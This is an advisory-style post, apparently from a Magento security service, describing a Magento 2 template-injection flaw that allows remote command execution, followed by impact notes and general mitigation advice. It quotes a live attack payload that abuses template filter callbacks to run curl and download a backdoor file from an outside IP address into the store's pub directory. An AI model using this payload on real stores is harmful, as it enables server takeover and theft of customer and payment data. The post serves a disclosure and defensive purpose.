Recently, a critical vulnerability was identified in the Magento 2 e-commerce system. This vulnerability allows attackers to execute malicious remote commands on the store’s server, compromising the integrity and security of both user and merchant data.
Attack Description
The attack is carried out through the exploitation of a vulnerability that enables the injection of malicious commands into the Magento 2 platform. The attack occurs via a flaw in Magento’s template system, where the attacker can inject malicious code by manipulating specific variables within the template.
In the specific case reported, the malicious code injected was as follows:
{{var this.getTemp lateFil ter().filt er(order)}} {{var this.getTemp lateFil ter().add AfterFil terCallb ack(system).Fil ter(cd${IFS%??}pub;curl${IFS%??}-o${IFS%??}cache.php${IFS%??}http://195.153.161.205/cache.php?m=48161-787-33048)}}
Here, the malicious code uses Magento’s template functions to insert commands into the server. The first part of the code attempts to access a template filter associated with an order. Then, the second part performs a command injection that uses environment variables and operating system commands to download a malicious file (cache.php) from a remote server controlled by the attacker and saves it in Magento’s pub directory.
This file can be used for various purposes, such as:
- Backdoor Creation: To maintain access to the compromised server even after the initial attack is detected.
- Data Theft: Collecting sensitive information, such as customer data, payment details, and more.
- Website Content Alteration: Modifying pages, inserting malicious scripts that could infect website visitors.
Impact and Consequences
The impact of such a vulnerability is extremely severe, as it allows for complete system compromise. Attackers can steal confidential data, alter transactions, and undermine customer trust in the store.
Companies using Magento 2 must be aware of the seriousness of this threat and take immediate steps to mitigate the risk. Suggested measures include:
- Immediate Update: Ensure that Magento 2 is updated with the latest security patches released by Adobe, the company responsible for Magento (Version 2.4.X-P9).
- Security Audit: Conduct regular audits to identify and fix potential system vulnerabilities.
- Continuous Monitoring: Implement security monitoring tools to detect suspicious activity in real-time.
Prevention and Mitigation
If your store has been a victim of this attack and needs assistance, contact us. We have tools and techniques that can help improve the security of your online store.